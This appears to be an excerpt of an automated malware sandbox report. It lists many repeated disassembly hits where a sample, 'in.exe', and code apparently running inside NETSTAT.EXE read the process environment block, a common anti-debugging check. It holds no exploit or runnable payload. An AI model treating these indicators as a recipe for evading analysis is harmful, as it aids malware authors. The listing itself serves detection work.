Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127B390 mov eax, dword ptr fs:[00000030h]	2_2_0127B390
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130138A mov eax, dword ptr fs:[00000030h]	2_2_0130138A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012703E2 mov eax, dword ptr fs:[00000030h]	2_2_012703E2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012703E2 mov eax, dword ptr fs:[00000030h]	2_2_012703E2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012703E2 mov eax, dword ptr fs:[00000030h]	2_2_012703E2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012703E2 mov eax, dword ptr fs:[00000030h]	2_2_012703E2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012703E2 mov eax, dword ptr fs:[00000030h]	2_2_012703E2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012703E2 mov eax, dword ptr fs:[00000030h]	2_2_012703E2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126DBE9 mov eax, dword ptr fs:[00000030h]	2_2_0126DBE9
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C53CA mov eax, dword ptr fs:[00000030h]	2_2_012C53CA
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C53CA mov eax, dword ptr fs:[00000030h]	2_2_012C53CA
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01284A2C mov eax, dword ptr fs:[00000030h]	2_2_01284A2C
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01284A2C mov eax, dword ptr fs:[00000030h]	2_2_01284A2C
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130AA16 mov eax, dword ptr fs:[00000030h]	2_2_0130AA16
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130AA16 mov eax, dword ptr fs:[00000030h]	2_2_0130AA16
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01258A0A mov eax, dword ptr fs:[00000030h]	2_2_01258A0A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124AA16 mov eax, dword ptr fs:[00000030h]	2_2_0124AA16
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124AA16 mov eax, dword ptr fs:[00000030h]	2_2_0124AA16
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01245210 mov eax, dword ptr fs:[00000030h]	2_2_01245210
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01245210 mov ecx, dword ptr fs:[00000030h]	2_2_01245210
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01245210 mov eax, dword ptr fs:[00000030h]	2_2_01245210
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01245210 mov eax, dword ptr fs:[00000030h]	2_2_01245210
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01263A1C mov eax, dword ptr fs:[00000030h]	2_2_01263A1C
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012FB260 mov eax, dword ptr fs:[00000030h]	2_2_012FB260
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012FB260 mov eax, dword ptr fs:[00000030h]	2_2_012FB260
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0128927A mov eax, dword ptr fs:[00000030h]	2_2_0128927A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01318A62 mov eax, dword ptr fs:[00000030h]	2_2_01318A62
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249240 mov eax, dword ptr fs:[00000030h]	2_2_01249240
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249240 mov eax, dword ptr fs:[00000030h]	2_2_01249240
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249240 mov eax, dword ptr fs:[00000030h]	2_2_01249240
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01249240 mov eax, dword ptr fs:[00000030h]	2_2_01249240
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130EA55 mov eax, dword ptr fs:[00000030h]	2_2_0130EA55
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012D4257 mov eax, dword ptr fs:[00000030h]	2_2_012D4257
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012452A5 mov eax, dword ptr fs:[00000030h]	2_2_012452A5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012452A5 mov eax, dword ptr fs:[00000030h]	2_2_012452A5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012452A5 mov eax, dword ptr fs:[00000030h]	2_2_012452A5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012452A5 mov eax, dword ptr fs:[00000030h]	2_2_012452A5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012452A5 mov eax, dword ptr fs:[00000030h]	2_2_012452A5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0125AAB0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0125AAB0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0127FAB0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127D294 mov eax, dword ptr fs:[00000030h]	2_2_0127D294
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127D294 mov eax, dword ptr fs:[00000030h]	2_2_0127D294
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272AE4 mov eax, dword ptr fs:[00000030h]	2_2_01272AE4
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272ACB mov eax, dword ptr fs:[00000030h]	2_2_01272ACB
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01318D34 mov eax, dword ptr fs:[00000030h]	2_2_01318D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130E539 mov eax, dword ptr fs:[00000030h]	2_2_0130E539
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01253D34 mov eax, dword ptr fs:[00000030h]	2_2_01253D34
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124AD30 mov eax, dword ptr fs:[00000030h]	2_2_0124AD30
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012CA537 mov eax, dword ptr fs:[00000030h]	2_2_012CA537
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01274D3B mov eax, dword ptr fs:[00000030h]	2_2_01274D3B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01274D3B mov eax, dword ptr fs:[00000030h]	2_2_01274D3B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01274D3B mov eax, dword ptr fs:[00000030h]	2_2_01274D3B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126C577 mov eax, dword ptr fs:[00000030h]	2_2_0126C577
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126C577 mov eax, dword ptr fs:[00000030h]	2_2_0126C577
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01283D43 mov eax, dword ptr fs:[00000030h]	2_2_01283D43
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C3540 mov eax, dword ptr fs:[00000030h]	2_2_012C3540
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01267D50 mov eax, dword ptr fs:[00000030h]	2_2_01267D50
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012735A1 mov eax, dword ptr fs:[00000030h]	2_2_012735A1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01271DB5 mov eax, dword ptr fs:[00000030h]	2_2_01271DB5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01271DB5 mov eax, dword ptr fs:[00000030h]	2_2_01271DB5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01271DB5 mov eax, dword ptr fs:[00000030h]	2_2_01271DB5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013105AC mov eax, dword ptr fs:[00000030h]	2_2_013105AC
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013105AC mov eax, dword ptr fs:[00000030h]	2_2_013105AC
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272581 mov eax, dword ptr fs:[00000030h]	2_2_01272581
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272581 mov eax, dword ptr fs:[00000030h]	2_2_01272581
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272581 mov eax, dword ptr fs:[00000030h]	2_2_01272581
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01272581 mov eax, dword ptr fs:[00000030h]	2_2_01272581
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01242D8A mov eax, dword ptr fs:[00000030h]	2_2_01242D8A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01242D8A mov eax, dword ptr fs:[00000030h]	2_2_01242D8A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01242D8A mov eax, dword ptr fs:[00000030h]	2_2_01242D8A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01242D8A mov eax, dword ptr fs:[00000030h]	2_2_01242D8A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01242D8A mov eax, dword ptr fs:[00000030h]	2_2_01242D8A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127FD9B mov eax, dword ptr fs:[00000030h]	2_2_0127FD9B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127FD9B mov eax, dword ptr fs:[00000030h]	2_2_0127FD9B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0125D5E0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0125D5E0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0130FDE2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0130FDE2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0130FDE2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	2_2_0130FDE2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012F8DF1 mov eax, dword ptr fs:[00000030h]	2_2_012F8DF1
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012C6DC9
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012C6DC9
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012C6DC9
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6DC9 mov ecx, dword ptr fs:[00000030h]	2_2_012C6DC9
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012C6DC9
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	2_2_012C6DC9
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127BC2C mov eax, dword ptr fs:[00000030h]	2_2_0127BC2C
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6C0A mov eax, dword ptr fs:[00000030h]	2_2_012C6C0A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6C0A mov eax, dword ptr fs:[00000030h]	2_2_012C6C0A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6C0A mov eax, dword ptr fs:[00000030h]	2_2_012C6C0A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6C0A mov eax, dword ptr fs:[00000030h]	2_2_012C6C0A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301C06 mov eax, dword ptr fs:[00000030h]	2_2_01301C06
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0131740D mov eax, dword ptr fs:[00000030h]	2_2_0131740D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0131740D mov eax, dword ptr fs:[00000030h]	2_2_0131740D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0131740D mov eax, dword ptr fs:[00000030h]	2_2_0131740D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126746D mov eax, dword ptr fs:[00000030h]	2_2_0126746D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127A44B mov eax, dword ptr fs:[00000030h]	2_2_0127A44B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DC450 mov eax, dword ptr fs:[00000030h]	2_2_012DC450
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DC450 mov eax, dword ptr fs:[00000030h]	2_2_012DC450
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125849B mov eax, dword ptr fs:[00000030h]	2_2_0125849B
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_013014FB mov eax, dword ptr fs:[00000030h]	2_2_013014FB
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_012C6CF0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_012C6CF0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_012C6CF0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01318CD6 mov eax, dword ptr fs:[00000030h]	2_2_01318CD6
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01244F2E mov eax, dword ptr fs:[00000030h]	2_2_01244F2E
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01244F2E mov eax, dword ptr fs:[00000030h]	2_2_01244F2E
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127E730 mov eax, dword ptr fs:[00000030h]	2_2_0127E730
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127A70E mov eax, dword ptr fs:[00000030h]	2_2_0127A70E
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127A70E mov eax, dword ptr fs:[00000030h]	2_2_0127A70E
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126F716 mov eax, dword ptr fs:[00000030h]	2_2_0126F716
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0131070D mov eax, dword ptr fs:[00000030h]	2_2_0131070D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0131070D mov eax, dword ptr fs:[00000030h]	2_2_0131070D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DFF10 mov eax, dword ptr fs:[00000030h]	2_2_012DFF10
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DFF10 mov eax, dword ptr fs:[00000030h]	2_2_012DFF10
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125FF60 mov eax, dword ptr fs:[00000030h]	2_2_0125FF60
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01318F6A mov eax, dword ptr fs:[00000030h]	2_2_01318F6A
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125EF40 mov eax, dword ptr fs:[00000030h]	2_2_0125EF40
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01258794 mov eax, dword ptr fs:[00000030h]	2_2_01258794
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C7794 mov eax, dword ptr fs:[00000030h]	2_2_012C7794
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C7794 mov eax, dword ptr fs:[00000030h]	2_2_012C7794
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C7794 mov eax, dword ptr fs:[00000030h]	2_2_012C7794
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012837F5 mov eax, dword ptr fs:[00000030h]	2_2_012837F5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124E620 mov eax, dword ptr fs:[00000030h]	2_2_0124E620
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012FFE3F mov eax, dword ptr fs:[00000030h]	2_2_012FFE3F
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124C600 mov eax, dword ptr fs:[00000030h]	2_2_0124C600
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124C600 mov eax, dword ptr fs:[00000030h]	2_2_0124C600
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0124C600 mov eax, dword ptr fs:[00000030h]	2_2_0124C600
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01278E00 mov eax, dword ptr fs:[00000030h]	2_2_01278E00
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01301608 mov eax, dword ptr fs:[00000030h]	2_2_01301608
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127A61C mov eax, dword ptr fs:[00000030h]	2_2_0127A61C
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0127A61C mov eax, dword ptr fs:[00000030h]	2_2_0127A61C
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0125766D mov eax, dword ptr fs:[00000030h]	2_2_0125766D
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126AE73 mov eax, dword ptr fs:[00000030h]	2_2_0126AE73
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126AE73 mov eax, dword ptr fs:[00000030h]	2_2_0126AE73
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126AE73 mov eax, dword ptr fs:[00000030h]	2_2_0126AE73
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126AE73 mov eax, dword ptr fs:[00000030h]	2_2_0126AE73
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0126AE73 mov eax, dword ptr fs:[00000030h]	2_2_0126AE73
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01257E41 mov eax, dword ptr fs:[00000030h]	2_2_01257E41
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01257E41 mov eax, dword ptr fs:[00000030h]	2_2_01257E41
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01257E41 mov eax, dword ptr fs:[00000030h]	2_2_01257E41
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01257E41 mov eax, dword ptr fs:[00000030h]	2_2_01257E41
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01257E41 mov eax, dword ptr fs:[00000030h]	2_2_01257E41
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01257E41 mov eax, dword ptr fs:[00000030h]	2_2_01257E41
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130AE44 mov eax, dword ptr fs:[00000030h]	2_2_0130AE44
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_0130AE44 mov eax, dword ptr fs:[00000030h]	2_2_0130AE44
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012C46A7 mov eax, dword ptr fs:[00000030h]	2_2_012C46A7
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01310EA5 mov eax, dword ptr fs:[00000030h]	2_2_01310EA5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01310EA5 mov eax, dword ptr fs:[00000030h]	2_2_01310EA5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01310EA5 mov eax, dword ptr fs:[00000030h]	2_2_01310EA5
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012DFE87 mov eax, dword ptr fs:[00000030h]	2_2_012DFE87
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012716E0 mov ecx, dword ptr fs:[00000030h]	2_2_012716E0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012576E2 mov eax, dword ptr fs:[00000030h]	2_2_012576E2
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01318ED6 mov eax, dword ptr fs:[00000030h]	2_2_01318ED6
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012736CC mov eax, dword ptr fs:[00000030h]	2_2_012736CC
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_012FFEC0 mov eax, dword ptr fs:[00000030h]	2_2_012FFEC0
Source: C:\Users\user\Desktop\in.exe	Code function: 2_2_01288EC7 mov eax, dword ptr fs:[00000030h]	2_2_01288EC7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0395138A mov eax, dword ptr fs:[00000030h]	8_2_0395138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03965BA5 mov eax, dword ptr fs:[00000030h]	8_2_03965BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392FF10 mov eax, dword ptr fs:[00000030h]	8_2_0392FF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392FF10 mov eax, dword ptr fs:[00000030h]	8_2_0392FF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0395131B mov eax, dword ptr fs:[00000030h]	8_2_0395131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0396070D mov eax, dword ptr fs:[00000030h]	8_2_0396070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0396070D mov eax, dword ptr fs:[00000030h]	8_2_0396070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03894F2E mov eax, dword ptr fs:[00000030h]	8_2_03894F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03894F2E mov eax, dword ptr fs:[00000030h]	8_2_03894F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CE730 mov eax, dword ptr fs:[00000030h]	8_2_038CE730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389DB40 mov eax, dword ptr fs:[00000030h]	8_2_0389DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038AEF40 mov eax, dword ptr fs:[00000030h]	8_2_038AEF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03968B58 mov eax, dword ptr fs:[00000030h]	8_2_03968B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389F358 mov eax, dword ptr fs:[00000030h]	8_2_0389F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03968F6A mov eax, dword ptr fs:[00000030h]	8_2_03968F6A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0392FE87 mov eax, dword ptr fs:[00000030h]	8_2_0392FE87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CD294 mov eax, dword ptr fs:[00000030h]	8_2_038CD294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038CD294 mov eax, dword ptr fs:[00000030h]	8_2_038CD294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038952A5 mov eax, dword ptr fs:[00000030h]	8_2_038952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038952A5 mov eax, dword ptr fs:[00000030h]	8_2_038952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038952A5 mov eax, dword ptr fs:[00000030h]	8_2_038952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038952A5 mov eax, dword ptr fs:[00000030h]	8_2_038952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038952A5 mov eax, dword ptr fs:[00000030h]	8_2_038952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03960EA5 mov eax, dword ptr fs:[00000030h]	8_2_03960EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03960EA5 mov eax, dword ptr fs:[00000030h]	8_2_03960EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03960EA5 mov eax, dword ptr fs:[00000030h]	8_2_03960EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_039146A7 mov eax, dword ptr fs:[00000030h]	8_2_039146A7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03968ED6 mov eax, dword ptr fs:[00000030h]	8_2_03968ED6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C36CC mov eax, dword ptr fs:[00000030h]	8_2_038C36CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0394FEC0 mov eax, dword ptr fs:[00000030h]	8_2_0394FEC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038C16E0 mov ecx, dword ptr fs:[00000030h]	8_2_038C16E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389C600 mov eax, dword ptr fs:[00000030h]	8_2_0389C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389C600 mov eax, dword ptr fs:[00000030h]	8_2_0389C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0389C600 mov eax, dword ptr fs:[00000030h]	8_2_0389C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0394FE3F mov eax, dword ptr fs:[00000030h]	8_2_0394FE3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899240 mov eax, dword ptr fs:[00000030h]	8_2_03899240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899240 mov eax, dword ptr fs:[00000030h]	8_2_03899240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899240 mov eax, dword ptr fs:[00000030h]	8_2_03899240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_03899240 mov eax, dword ptr fs:[00000030h]	8_2_03899240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038A766D mov eax, dword ptr fs:[00000030h]	8_2_038A766D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0394B260 mov eax, dword ptr fs:[00000030h]	8_2_0394B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0394B260 mov eax, dword ptr fs:[00000030h]	8_2_0394B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_038D927A mov eax, dword ptr fs:[00000030h]	8_2_038D927A
